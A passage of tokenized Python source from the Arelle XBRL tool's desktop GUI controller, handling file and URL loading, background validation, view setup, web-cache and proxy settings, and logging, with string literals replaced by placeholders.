<EOL> filesource = None <EOL> filesource = openFileSource ( filename , self , <EOL> checkIfXmlIsEis = self . modelManager . disclosureSystem and <EOL> self . modelManager . disclosureSystem . validationType == "<STR_LIT>" ) <EOL> if filesource . isArchive and not filesource . selection : <EOL> from arelle import DialogOpenArchive <EOL> filename = DialogOpenArchive . askArchiveFile ( self , filesource ) <EOL> if filename : <EOL> if importToDTS : <EOL> if not isHttpUrl ( filename ) : <EOL> self . config [ "<STR_LIT>" ] = os . path . dirname ( filename ) <EOL> else : <EOL> if not isHttpUrl ( filename ) : <EOL> self . config [ "<STR_LIT>" ] = os . path . dirname ( filesource . baseurl if filesource . isArchive else filename ) <EOL> self . updateFileHistory ( filename , importToDTS ) <EOL> thread = threading . Thread ( target = lambda : self . backgroundLoadXbrl ( filesource , importToDTS , selectTopView ) ) <EOL> thread . daemon = True <EOL> thread . start ( ) <EOL> def webOpen ( self , * ignore ) : <EOL> if not self . okayToContinue ( ) : <EOL> return <EOL> url = DialogURL . askURL ( self . parent , buttonSEC = True , buttonRSS = True ) <EOL> if url : <EOL> self . updateFileHistory ( url , False ) <EOL> filesource = openFileSource ( url , self ) <EOL> if filesource . isArchive and not filesource . selection : <EOL> from arelle import DialogOpenArchive <EOL> url = DialogOpenArchive . askArchiveFile ( self , filesource ) <EOL> self . updateFileHistory ( url , False ) <EOL> thread = threading . Thread ( target = lambda : self . backgroundLoadXbrl ( filesource , False , False ) ) <EOL> thread . daemon = True <EOL> thread . start ( ) <EOL> def importWebOpen ( self , * ignore ) : <EOL> if not self . modelManager . modelXbrl or self . modelManager . modelXbrl . modelDocument . type not in ( <EOL> ModelDocument . Type . SCHEMA , ModelDocument . Type . LINKBASE , ModelDocument . Type . INSTANCE , ModelDocument . Type . INLINEXBRL ) : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , parent = self . parent ) <EOL> return False <EOL> url = DialogURL . askURL ( self . parent , buttonSEC = False , buttonRSS = False ) <EOL> if url : <EOL> self . fileOpenFile ( url , importToDTS = True ) <EOL> def backgroundLoadXbrl ( self , filesource , importToDTS , selectTopView ) : <EOL> startedAt = time . time ( ) <EOL> try : <EOL> if importToDTS : <EOL> action = _ ( "<STR_LIT>" ) <EOL> profileStat = "<STR_LIT>" <EOL> modelXbrl = self . modelManager . modelXbrl <EOL> if modelXbrl : <EOL> ModelDocument . load ( modelXbrl , filesource . url , isSupplemental = importToDTS ) <EOL> modelXbrl . relationshipSets . clear ( ) <EOL> else : <EOL> action = _ ( "<STR_LIT>" ) <EOL> profileStat = "<STR_LIT>" <EOL> modelXbrl = self . modelManager . load ( filesource , _ ( "<STR_LIT>" ) ) <EOL> except ModelDocument . LoadingException : <EOL> self . showStatus ( _ ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> return <EOL> except Exception as err : <EOL> msg = _ ( "<STR_LIT>" ) . format ( <EOL> filesource . url , <EOL> err , <EOL> traceback . format_tb ( sys . exc_info ( ) [ <NUM_LIT:2> ] ) ) <EOL> self . addToLog ( msg ) ; <EOL> self . showStatus ( _ ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> return <EOL> if modelXbrl and modelXbrl . modelDocument : <EOL> statTime = time . time ( ) - startedAt <EOL> modelXbrl . profileStat ( profileStat , statTime ) <EOL> self . addToLog ( format_string ( self . modelManager . locale , <EOL> _ ( "<STR_LIT>" ) , <EOL> ( action , statTime ) ) ) <EOL> if modelXbrl . hasTableRendering : <EOL> self . showStatus ( _ ( "<STR_LIT>" ) ) <EOL> RenderingEvaluator . init ( modelXbrl ) <EOL> self . showStatus ( _ ( "<STR_LIT>" ) . format ( action ) ) <EOL> self . waitForUiThreadQueue ( ) <EOL> self . uiThreadQueue . put ( ( self . showLoadedXbrl , [ modelXbrl , importToDTS , selectTopView ] ) ) <EOL> else : <EOL> self . addToLog ( format_string ( self . modelManager . locale , <EOL> _ ( "<STR_LIT>" ) , <EOL> ( action , time . time ( ) - startedAt ) ) ) <EOL> def showLoadedXbrl ( self , modelXbrl , attach , selectTopView = False ) : <EOL> startedAt = time . time ( ) <EOL> currentAction = "<STR_LIT>" <EOL> topView = None <EOL> self . currentView = None <EOL> try : <EOL> if attach : <EOL> modelXbrl . closeViews ( ) <EOL> self . parent . title ( _ ( "<STR_LIT>" ) . format ( <EOL> os . path . basename ( modelXbrl . modelDocument . uri ) ) ) <EOL> self . setValidateTooltipText ( ) <EOL> if modelXbrl . modelDocument . type in ModelDocument . Type . TESTCASETYPES : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinTests . viewTests ( modelXbrl , self . tabWinTopRt ) <EOL> topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> elif modelXbrl . modelDocument . type == ModelDocument . Type . VERSIONINGREPORT : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinVersReport . viewVersReport ( modelXbrl , self . tabWinTopRt ) <EOL> from arelle . ViewWinDiffs import ViewWinDiffs <EOL> ViewWinDiffs ( modelXbrl , self . tabWinBtm , lang = self . labelLang ) <EOL> elif modelXbrl . modelDocument . type == ModelDocument . Type . RSSFEED : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRssFeed . viewRssFeed ( modelXbrl , self . tabWinTopRt ) <EOL> topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> else : <EOL> if modelXbrl . hasTableIndexing : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopLeft , ( "<STR_LIT>" , ( XbrlConst . euGroupTable , ) ) , lang = self . labelLang , <EOL> treeColHdr = "<STR_LIT>" , showLinkroles = False , showColumns = False , expandAll = True ) <EOL> elif modelXbrl . modelDocument . type in ( ModelDocument . Type . INSTANCE , ModelDocument . Type . INLINEXBRL , ModelDocument . Type . INLINEXBRLDOCUMENTSET ) : <EOL> currentAction = "<STR_LIT>" <EOL> firstTableLinkroleURI , indexLinkroleURI = TableStructure . evaluateTableIndex ( modelXbrl ) <EOL> if firstTableLinkroleURI : <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopLeft , ( "<STR_LIT>" , ( XbrlConst . parentChild , ) ) , lang = self . labelLang , linkrole = indexLinkroleURI , <EOL> treeColHdr = "<STR_LIT>" , showRelationships = False , showColumns = False , expandAll = False , hasTableIndex = True ) <EOL> '''<STR_LIT>''' <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinDTS . viewDTS ( modelXbrl , self . tabWinTopLeft , altTabWin = self . tabWinTopRt ) <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinConcepts . viewConcepts ( modelXbrl , self . tabWinBtm , "<STR_LIT>" , lang = self . labelLang , altTabWin = self . tabWinTopRt ) <EOL> if modelXbrl . hasTableRendering : <EOL> ViewWinRenderedGrid . viewRenderedGrid ( modelXbrl , self . tabWinTopRt , lang = self . labelLang ) <EOL> if topView is None : topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> if modelXbrl . modelDocument . type in ( ModelDocument . Type . INSTANCE , ModelDocument . Type . INLINEXBRL , ModelDocument . Type . INLINEXBRLDOCUMENTSET ) : <EOL> currentAction = "<STR_LIT>" <EOL> if not modelXbrl . hasTableRendering : <EOL> ViewWinFactTable . viewFacts ( modelXbrl , self . tabWinTopRt , linkrole = firstTableLinkroleURI , lang = self . labelLang , expandAll = firstTableLinkroleURI ) <EOL> if topView is None : topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinFactList . viewFacts ( modelXbrl , self . tabWinTopRt , lang = self . labelLang ) <EOL> if topView is None : topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> if modelXbrl . hasFormulae : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinFormulae . viewFormulae ( modelXbrl , self . tabWinTopRt ) <EOL> if topView is None : topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopRt , XbrlConst . parentChild , lang = self . labelLang ) <EOL> if topView is None : topView = modelXbrl . views [ - <NUM_LIT:1> ] <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopRt , XbrlConst . summationItem , lang = self . labelLang ) <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopRt , "<STR_LIT>" , lang = self . labelLang ) <EOL> if modelXbrl . hasTableRendering : <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopRt , "<STR_LIT>" , lang = self . labelLang ) <EOL> for name , arcroles in sorted ( self . config . get ( "<STR_LIT>" , { } ) . items ( ) ) : <EOL> if XbrlConst . arcroleGroupDetect in arcroles : <EOL> currentAction = name + "<STR_LIT>" <EOL> ViewWinRelationshipSet . viewRelationshipSet ( modelXbrl , self . tabWinTopRt , ( name , arcroles ) , lang = self . labelLang ) <EOL> currentAction = "<STR_LIT>" <EOL> ViewWinProperties . viewProperties ( modelXbrl , self . tabWinTopLeft ) <EOL> currentAction = "<STR_LIT>" <EOL> viewTime = time . time ( ) - startedAt <EOL> modelXbrl . profileStat ( "<STR_LIT>" , viewTime ) <EOL> self . addToLog ( format_string ( self . modelManager . locale , <EOL> _ ( "<STR_LIT>" ) , viewTime ) ) <EOL> if selectTopView and topView : <EOL> topView . select ( ) <EOL> self . currentView = topView <EOL> for xbrlLoadedMethod in pluginClassMethods ( "<STR_LIT>" ) : <EOL> xbrlLoadedMethod ( self , modelXbrl , attach ) <EOL> except Exception as err : <EOL> msg = _ ( "<STR_LIT>" ) . format ( <EOL> currentAction , <EOL> err , <EOL> traceback . format_tb ( sys . exc_info ( ) [ <NUM_LIT:2> ] ) ) <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , msg , parent = self . parent ) <EOL> self . addToLog ( msg ) ; <EOL> self . showStatus ( _ ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> def showFormulaOutputInstance ( self , priorOutputInstance , currentOutputInstance ) : <EOL> currentAction = "<STR_LIT>" <EOL> try : <EOL> if priorOutputInstance : <EOL> priorOutputInstance . close ( ) <EOL> currentAction = "<STR_LIT>" <EOL> if currentOutputInstance : <EOL> ViewWinXml . viewXml ( currentOutputInstance , self . tabWinBtm , "<STR_LIT>" , currentOutputInstance . modelDocument . xmlDocument ) <EOL> except Exception as err : <EOL> msg = _ ( "<STR_LIT>" ) . format ( <EOL> currentAction , <EOL> err , <EOL> traceback . format_tb ( sys . exc_info ( ) [ <NUM_LIT:2> ] ) ) <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , msg , parent = self . parent ) <EOL> self . addToLog ( msg ) ; <EOL> self . showStatus ( _ ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> def showProfileStats ( self ) : <EOL> modelXbrl = self . modelManager . modelXbrl <EOL> if modelXbrl and self . modelManager . collectProfileStats : <EOL> modelXbrl . logProfileStats ( ) <EOL> def clearProfileStats ( self ) : <EOL> modelXbrl = self . modelManager . modelXbrl <EOL> if modelXbrl and self . modelManager . collectProfileStats : <EOL> modelXbrl . profileStats . clear ( ) <EOL> def fileClose ( self , * ignore ) : <EOL> if not self . okayToContinue ( ) : <EOL> return <EOL> self . modelManager . close ( ) <EOL> self . parent . title ( _ ( "<STR_LIT>" ) ) <EOL> self . setValidateTooltipText ( ) <EOL> self . currentView = None <EOL> def validate ( self ) : <EOL> modelXbrl = self . modelManager . modelXbrl <EOL> if modelXbrl : <EOL> if ( modelXbrl . modelManager . validateDisclosureSystem and <EOL> not modelXbrl . modelManager . disclosureSystem . selection ) : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> parent = self . parent ) <EOL> else : <EOL> if modelXbrl . modelDocument . type in ModelDocument . Type . TESTCASETYPES : <EOL> for pluginXbrlMethod in pluginClassMethods ( "<STR_LIT>" ) : <EOL> pluginXbrlMethod ( self , None , modelXbrl ) <EOL> thread = threading . Thread ( target = lambda : self . backgroundValidate ( ) ) <EOL> thread . daemon = True <EOL> thread . start ( ) <EOL> def backgroundValidate ( self ) : <EOL> startedAt = time . time ( ) <EOL> modelXbrl = self . modelManager . modelXbrl <EOL> priorOutputInstance = modelXbrl . formulaOutputInstance <EOL> modelXbrl . formulaOutputInstance = None <EOL> self . modelManager . validate ( ) <EOL> self . addToLog ( format_string ( self . modelManager . locale , <EOL> _ ( "<STR_LIT>" ) , <EOL> time . time ( ) - startedAt ) ) <EOL> if not modelXbrl . isClosed and ( priorOutputInstance or modelXbrl . formulaOutputInstance ) : <EOL> self . uiThreadQueue . put ( ( self . showFormulaOutputInstance , [ priorOutputInstance , modelXbrl . formulaOutputInstance ] ) ) <EOL> self . uiThreadQueue . put ( ( self . logSelect , [ ] ) ) <EOL> def compareDTSes ( self ) : <EOL> countLoadedDTSes = len ( self . modelManager . loadedModelXbrls ) <EOL> if countLoadedDTSes != <NUM_LIT:2> : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( countLoadedDTSes ) , <EOL> parent = self . parent ) <EOL> return False <EOL> versReportFile = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = self . config . setdefault ( "<STR_LIT>" , "<STR_LIT:.>" ) , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if not versReportFile : <EOL> return False <EOL> self . config [ "<STR_LIT>" ] = os . path . dirname ( versReportFile ) <EOL> self . saveConfig ( ) <EOL> thread = threading . Thread ( target = lambda : self . backgroundCompareDTSes ( versReportFile ) ) <EOL> thread . daemon = True <EOL> thread . start ( ) <EOL> def backgroundCompareDTSes ( self , versReportFile ) : <EOL> startedAt = time . time ( ) <EOL> modelVersReport = self . modelManager . compareDTSes ( versReportFile ) <EOL> if modelVersReport and modelVersReport . modelDocument : <EOL> self . addToLog ( format_string ( self . modelManager . locale , <EOL> _ ( "<STR_LIT>" ) , <EOL> time . time ( ) - startedAt ) ) <EOL> self . uiThreadQueue . put ( ( self . showComparedDTSes , [ modelVersReport ] ) ) <EOL> def showComparedDTSes ( self , modelVersReport ) : <EOL> modelVersReport . modelDocument . fromDTS . closeViews ( ) <EOL> modelVersReport . modelDocument . toDTS . closeViews ( ) <EOL> self . showLoadedXbrl ( modelVersReport , True ) <EOL> def loadFile ( self , filename ) : <EOL> self . filename = filename <EOL> self . listBox . delete ( <NUM_LIT:0> , END ) <EOL> self . dirty = False <EOL> try : <EOL> with open ( self . filename , "<STR_LIT:rb>" ) as fh : <EOL> self . data = pickle . load ( fh ) <EOL> for name in sorted ( self . data , key = str . lower ) : <EOL> self . listBox . insert ( END , name ) <EOL> self . showStatus ( _ ( "<STR_LIT>" ) . format ( <EOL> self . listbox . size ( ) , <EOL> self . filename ) , clearAfter = <NUM_LIT> ) <EOL> self . parent . title ( _ ( "<STR_LIT>" ) . format ( <EOL> os . path . basename ( self . filename ) ) ) <EOL> except ( EnvironmentError , pickle . PickleError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> self . filename , <EOL> err ) , <EOL> parent = self . parent ) <EOL> def quit ( self , event = None , restartAfterQuit = False ) : <EOL> if self . okayToContinue ( ) : <EOL> self . modelManager . close ( ) <EOL> logging . shutdown ( ) <EOL> global restartMain <EOL> restartMain = restartAfterQuit <EOL> state = self . parent . state ( ) <EOL> if state == "<STR_LIT>" : <EOL> self . config [ "<STR_LIT>" ] = self . parent . geometry ( ) <EOL> if state in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> self . config [ "<STR_LIT>" ] = state <EOL> if self . isMSW : adjustW = <NUM_LIT:4> ; adjustH = <NUM_LIT:6> <EOL> elif self . isMac : adjustW = <NUM_LIT> ; adjustH = <NUM_LIT> <EOL> else : adjustW = <NUM_LIT:2> ; adjustH = <NUM_LIT:2> <EOL> self . config [ "<STR_LIT>" ] = ( self . tabWinTopLeft . winfo_width ( ) - adjustW , <EOL> self . tabWinTopLeft . winfo_height ( ) - adjustH ) <EOL> super ( CntlrWinMain , self ) . close ( saveConfig = True ) <EOL> self . parent . unbind_all ( ( ) ) <EOL> self . parent . destroy ( ) <EOL> if self . logFile : <EOL> self . logFile . close ( ) <EOL> self . logFile = None <EOL> def restart ( self , event = None ) : <EOL> self . quit ( event , restartAfterQuit = True ) <EOL> def setWorkOffline ( self , * args ) : <EOL> self . webCache . workOffline = self . workOffline . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . webCache . workOffline <EOL> self . saveConfig ( ) <EOL> def confirmClearWebCache ( self ) : <EOL> if tkinter . messagebox . askyesno ( <EOL> _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> parent = self . parent ) : <EOL> def backgroundClearCache ( ) : <EOL> self . showStatus ( _ ( "<STR_LIT>" ) ) <EOL> self . webCache . clear ( ) <EOL> self . showStatus ( _ ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> thread = threading . Thread ( target = lambda : backgroundClearCache ( ) ) <EOL> thread . daemon = True <EOL> thread . start ( ) <EOL> def manageWebCache ( self ) : <EOL> if sys . platform . startswith ( "<STR_LIT>" ) : <EOL> command = '<STR_LIT>' <EOL> elif sys . platform in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> command = '<STR_LIT>' <EOL> else : <EOL> command = '<STR_LIT>' <EOL> try : <EOL> subprocess . Popen ( [ command , self . webCache . cacheDir ] ) <EOL> except : <EOL> pass <EOL> def setupProxy ( self ) : <EOL> from arelle . DialogUserPassword import askProxy <EOL> proxySettings = askProxy ( self . parent , self . config . get ( "<STR_LIT>" ) ) <EOL> if proxySettings : <EOL> self . webCache . resetProxies ( proxySettings ) <EOL> self . config [ "<STR_LIT>" ] = proxySettings <EOL> self . saveConfig ( ) <EOL> def setValidateDisclosureSystem ( self , * args ) : <EOL> self . modelManager . validateDisclosureSystem = self . validateDisclosureSystem . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . validateDisclosureSystem <EOL> self . saveConfig ( ) <EOL> if self . modelManager . validateDisclosureSystem : <EOL> if not self . modelManager . disclosureSystem or not self . modelManager . disclosureSystem . selection : <EOL> self . selectDisclosureSystem ( ) <EOL> self . setValidateTooltipText ( ) <EOL> def selectDisclosureSystem ( self , * args ) : <EOL> from arelle import DialogOpenArchive <EOL> self . config [ "<STR_LIT>" ] = DialogOpenArchive . selectDisclosureSystem ( self , self . modelManager . disclosureSystem ) <EOL> self . saveConfig ( ) <EOL> self . setValidateTooltipText ( ) <EOL> def formulaParametersDialog ( self , * args ) : <EOL> DialogFormulaParameters . getParameters ( self ) <EOL> self . setValidateTooltipText ( ) <EOL> def rssWatchOptionsDialog ( self , * args ) : <EOL> from arelle import DialogRssWatch <EOL> DialogRssWatch . getOptions ( self ) <EOL> def rssWatchControl ( self , start = False , stop = False , close = False ) : <EOL> from arelle . ModelDocument import Type <EOL> from arelle import WatchRss <EOL> if not self . modelManager . rssWatchOptions . get ( "<STR_LIT>" ) : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> parent = self . parent ) <EOL> return False <EOL> rssModelXbrl = None <EOL> for loadedModelXbrl in self . modelManager . loadedModelXbrls : <EOL> if ( loadedModelXbrl . modelDocument . type == Type . RSSFEED and <EOL> loadedModelXbrl . modelDocument . uri == self . modelManager . rssWatchOptions . get ( "<STR_LIT>" ) ) : <EOL> rssModelXbrl = loadedModelXbrl <EOL> break <EOL> if start : <EOL> if not rssModelXbrl : <EOL> rssModelXbrl = self . modelManager . create ( Type . RSSFEED , self . modelManager . rssWatchOptions . get ( "<STR_LIT>" ) ) <EOL> self . showLoadedXbrl ( rssModelXbrl , False ) <EOL> if not hasattr ( rssModelXbrl , "<STR_LIT>" ) : <EOL> WatchRss . initializeWatcher ( rssModelXbrl ) <EOL> rssModelXbrl . watchRss . start ( ) <EOL> elif stop : <EOL> if rssModelXbrl and rssModelXbrl . watchRss : <EOL> rssModelXbrl . watchRss . stop ( ) <EOL> def rssWatchUpdateOption ( self , latestPubDate = None ) : <EOL> self . uiThreadQueue . put ( ( self . uiRssWatchUpdateOption , [ latestPubDate ] ) ) <EOL> def uiRssWatchUpdateOption ( self , latestPubDate ) : <EOL> if latestPubDate : <EOL> self . modelManager . rssWatchOptions [ "<STR_LIT>" ] = latestPubDate <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . rssWatchOptions <EOL> self . saveConfig ( ) <EOL> def languagesDialog ( self , * args ) : <EOL> override = self . lang if self . lang != self . modelManager . defaultLang else "<STR_LIT>" <EOL> import tkinter . simpledialog <EOL> newValue = tkinter . simpledialog . askstring ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( <EOL> self . modelManager . defaultLang , override ) , <EOL> parent = self . parent ) <EOL> if newValue is not None : <EOL> self . config [ "<STR_LIT>" ] = newValue <EOL> if newValue : <EOL> self . lang = newValue <EOL> else : <EOL> self . lang = self . modelManager . defaultLang <EOL> if self . modelManager . modelXbrl and self . modelManager . modelXbrl . modelDocument : <EOL> self . showLoadedXbrl ( self . modelManager . modelXbrl , True ) <EOL> self . saveConfig ( ) <EOL> def setValidateTooltipText ( self ) : <EOL> if self . modelManager . modelXbrl and not self . modelManager . modelXbrl . isClosed and self . modelManager . modelXbrl . modelDocument is not None : <EOL> valType = self . modelManager . modelXbrl . modelDocument . type <EOL> if valType in ( ModelDocument . Type . SCHEMA , ModelDocument . Type . LINKBASE ) : <EOL> valName = "<STR_LIT>" <EOL> else : <EOL> valName = ModelDocument . Type . typeName [ valType ] <EOL> if valType == ModelDocument . Type . VERSIONINGREPORT : <EOL> v = _ ( "<STR_LIT>" ) <EOL> else : <EOL> if self . modelManager . validateCalcLB : <EOL> if self . modelManager . validateInferDecimals : <EOL> c = _ ( "<STR_LIT>" ) <EOL> else : <EOL> c = _ ( "<STR_LIT>" ) <EOL> else : <EOL> c = "<STR_LIT>" <EOL> if self . modelManager . validateUtr : <EOL> u = _ ( "<STR_LIT>" ) <EOL> else : <EOL> u = "<STR_LIT>" <EOL> if self . modelManager . validateDisclosureSystem : <EOL> v = _ ( "<STR_LIT>" ) . format ( <EOL> valName , self . modelManager . disclosureSystem . selection , c , u ) <EOL> else : <EOL> v = _ ( "<STR_LIT>" ) . format ( valName , c , u ) <EOL> else : <EOL> v = _ ( "<STR_LIT>" ) <EOL> self . validateTooltipText . set ( v ) <EOL> def setValidateCalcLB ( self , * args ) : <EOL> self . modelManager . validateCalcLB = self . validateCalcLB . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . validateCalcLB <EOL> self . saveConfig ( ) <EOL> self . setValidateTooltipText ( ) <EOL> def setValidateInferDecimals ( self , * args ) : <EOL> self . modelManager . validateInferDecimals = self . validateInferDecimals . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . validateInferDecimals <EOL> self . saveConfig ( ) <EOL> self . setValidateTooltipText ( ) <EOL> def setValidateUtr ( self , * args ) : <EOL> self . modelManager . validateUtr = self . validateUtr . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . validateUtr <EOL> self . saveConfig ( ) <EOL> self . setValidateTooltipText ( ) <EOL> def setCollectProfileStats ( self , * args ) : <EOL> self . modelManager . collectProfileStats = self . collectProfileStats . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . collectProfileStats <EOL> self . saveConfig ( ) <EOL> def setShowDebugMessages ( self , * args ) : <EOL> self . config [ "<STR_LIT>" ] = self . showDebugMessages . get ( ) <EOL> self . saveConfig ( ) <EOL> def find ( self , * args ) : <EOL> from arelle . DialogFind import find <EOL> find ( self ) <EOL> def helpAbout ( self , event = None ) : <EOL> from arelle import DialogAbout , Version <EOL> from lxml import etree <EOL> DialogAbout . about ( self . parent , <EOL> _ ( "<STR_LIT>" ) , <EOL> os . path . join ( self . imagesDir , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> . format ( self . __version__ , self . systemWordSize , Version . version , <EOL> _ ( "<STR_LIT>" ) if self . hasWebServer else "<STR_LIT>" , <EOL> sys . version_info , etree . LXML_VERSION ) ) <EOL> def addToLog ( self , message , messageCode = "<STR_LIT>" , messageArgs = None , file = "<STR_LIT>" , refs = [ ] , level = logging . INFO ) : <EOL> if level == logging . DEBUG and not self . showDebugMessages . get ( ) : <EOL> return <EOL> if messageCode and messageCode not in message : <EOL> message = "<STR_LIT>" . format ( messageCode , message ) <EOL> if refs : <EOL> message += "<STR_LIT>" + Cntlr . logRefsFileLines ( refs ) <EOL> elif file : <EOL> if isinstance ( file , ( tuple , list , set ) ) : <EOL> message += "<STR_LIT>" + "<STR_LIT:U+002CU+0020>" . join ( file ) <EOL> elif isinstance ( file , _STR_BASE ) : <EOL> message += "<STR_LIT>" + file <EOL> if isinstance ( messageArgs , dict ) : <EOL> message = message % messageArgs <EOL> self . uiThreadQueue . put ( ( self . uiAddToLog , [ message ] ) ) <EOL> def uiAddToLog ( self , message ) : <EOL> try : <EOL> self . logView . append ( message ) <EOL> except : <EOL> pass <EOL> def logClear ( self , * ignore ) : <EOL> self . logView . clear ( ) <EOL> def logSelect ( self , * ignore ) : <EOL> self . logView . select ( ) <EOL> def logSaveToFile ( self , * ignore ) : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = "<STR_LIT:.>" , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if not filename : <EOL> return False <EOL> try : <EOL> self . logView . saveToFile ( filename ) <EOL> except ( IOError , EnvironmentError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> filename , err ) , <EOL> parent = self . parent ) <EOL> return True ; <EOL> def viewModelObject ( self , modelXbrl , objectId ) : <EOL> self . waitForUiThreadQueue ( ) <EOL> self . uiThreadQueue . put ( ( self . uiViewModelObject , [ modelXbrl , objectId ] ) ) <EOL> def uiViewModelObject ( self , modelXbrl , objectId ) : <EOL> modelXbrl . viewModelObject ( objectId ) <EOL> def reloadViews ( self , modelXbrl ) : <EOL> self . uiThreadQueue . put ( ( self . uiReloadViews , [ modelXbrl ] ) ) <EOL> def uiReloadViews ( self , modelXbrl ) : <EOL> for view in modelXbrl . views : <EOL> view . view ( ) <EOL> def showStatus ( self , message , clearAfter = None ) : <EOL> self . uiThreadQueue . put ( ( self . uiShowStatus , [ message , clearAfter ] ) ) <EOL> def uiClearStatusTimerEvent ( self ) : <EOL> if self . statusbarTimerId : <EOL> self . statusbar [ "<STR_LIT:text>" ] = "<STR_LIT>" <EOL> self . statusbarTimerId = None <EOL> def uiShowStatus ( self , message , clearAfter = None ) : <EOL> if self . statusbarTimerId : <EOL> self . statusbarTimerId = None <EOL> self . statusbar [ "<STR_LIT:text>" ] = message <EOL> if clearAfter is not None and clearAfter > <NUM_LIT:0> : <EOL> self . statusbarTimerId = self . statusbar . after ( clearAfter , self . uiClearStatusTimerEvent ) <EOL> def internet_user_password ( self , host , realm ) : <EOL> from arelle . DialogUserPassword import askUserPassword <EOL> untilDone = threading . Event ( ) <EOL> result = [ ] <EOL> self . uiThreadQueue . put ( ( askUserPassword , [ self . parent , host , realm , untilDone , result ] ) ) <EOL> untilDone . wait ( ) <EOL> return result [ <NUM_LIT:0> ] <EOL> def internet_logon ( self , url , quotedUrl , dialogCaption , dialogText ) : <EOL> from arelle . DialogUserPassword import askInternetLogon <EOL> untilDone = threading . Event ( ) <EOL> result = [ ] <EOL> self . uiThreadQueue . put ( ( askInternetLogon , [ self . parent , url , quotedUrl , dialogCaption , dialogText , untilDone , result ] ) ) <EOL> untilDone . wait ( ) <EOL> return result [ <NUM_LIT:0> ] <EOL> def waitForUiThreadQueue ( self ) : <EOL> for i in range ( <NUM_LIT> ) : <EOL> if self . uiThreadQueue . empty ( ) : <EOL> break <EOL> time . sleep ( <NUM_LIT> ) <EOL> def uiThreadChecker ( self , widget , delayMsecs = <NUM_LIT:100> ) : <EOL> while not self . uiThreadQueue . empty ( ) : <EOL> try : <EOL> ( callback , args ) = self . uiThreadQueue . get ( block = False ) <EOL> except queue . Empty : <EOL> pass <EOL> else : <EOL> callback ( * args ) <EOL> widget . after ( delayMsecs , lambda : self . uiThreadChecker ( widget ) ) <EOL> def uiFileDialog ( self , action , title = None , initialdir = None , filetypes = [ ] , defaultextension = None , owner = None , multiple = False , parent = None ) : <EOL> if parent is None : parent = self . parent 